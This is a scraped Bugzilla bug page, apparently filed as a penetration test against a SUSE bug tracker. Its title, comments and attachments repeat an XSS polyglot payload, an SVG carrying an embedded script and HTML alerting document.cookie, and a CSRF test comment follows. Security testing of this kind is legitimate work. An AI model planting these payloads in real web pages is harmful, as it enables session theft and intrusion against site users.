1177944 – PENTEST - IGNORE THIS BUG jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Bug 1177944 - PENTEST - IGNORE THIS BUG jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Summary: PENTEST - IGNORE THIS BUG jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(...

Status:	NEW

Alias:	None

Product:	TaskJuggler
Classification:	SUSE Tools
Component:	Website (show other bugs)
Version:	TaskJuggler
Hardware:	Other Other

Priority:	P5 - None Severity: Normal
Target Milestone:	---
Assignee:	Elliot Ward
QA Contact:	Elliot Ward

URL:	http://www.evil-domain.com
Whiteboard:	jaVasCript:/-/`/\`/'/"//(/ */...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2020-10-21 08:05 UTC by Elliot Ward
Modified:	2020-10-26 15:42 UTC (History)
CC List:	2 users (show)

See Also:
Found By:	---
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
<svg xmlns="http://www.w3.org/1999/svg"> <script> alert(1) </script> </svg> (75 bytes, image/svg+xml) 2020-10-21 08:05 UTC, Elliot Ward	Details
https://bugzilla.suse.com/attachment.cgi?id=842849 (43 bytes, text/html) 2020-10-21 08:10 UTC, Elliot Ward	Details
*jaVasCript:/-/`/\`/'/"/*/(/ /oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e* (83 bytes, text/html) 2020-10-21 08:12 UTC, Elliot Ward	Details
asd (123 bytes, text/html) 2020-10-21 08:17 UTC, Elliot Ward	Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Elliot Ward 2020-10-21 08:05:55 UTC

Created attachment 842849 [details]
<svg xmlns="http://www.w3.org/1999/svg"> <script> alert(1) </script> </svg>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Comment 1 Elliot Ward 2020-10-21 08:10:31 UTC

Created attachment 842850 [details]
https://bugzilla.suse.com/attachment.cgi?id=842849

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Comment 2 Elliot Ward 2020-10-21 08:12:02 UTC

Created attachment 842851 [details]
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Comment 3 Elliot Ward 2020-10-21 08:16:14 UTC

Comment on attachment 842851 [details]
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

><html>
><body>
><h1>test</h1>
><script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
></body>
></html>

Comment 4 Elliot Ward 2020-10-21 08:17:25 UTC

Created attachment 842852 [details]
asd

asd

Comment 5 Elliot Ward 2020-10-21 08:23:23 UTC

test 123

Comment 6 Elliot Ward 2020-10-21 08:24:12 UTC

test1234

Comment 7 Elliot Eard 2020-10-21 08:33:39 UTC

test12345

Comment 8 Elliot Ward 2020-10-21 08:47:16 UTC

(In reply to Elliot Eard from comment #7)
> test12345

hello, world123

Comment 9 Elliot Ward 2020-10-21 08:47:49 UTC

(In reply to Elliot Eard from comment #7)
> test12345

heCSRFEDllo, world123

Comment 10 Elliot Eard 2020-10-21 08:49:42 UTC

YOUVE BEEN CSRF'D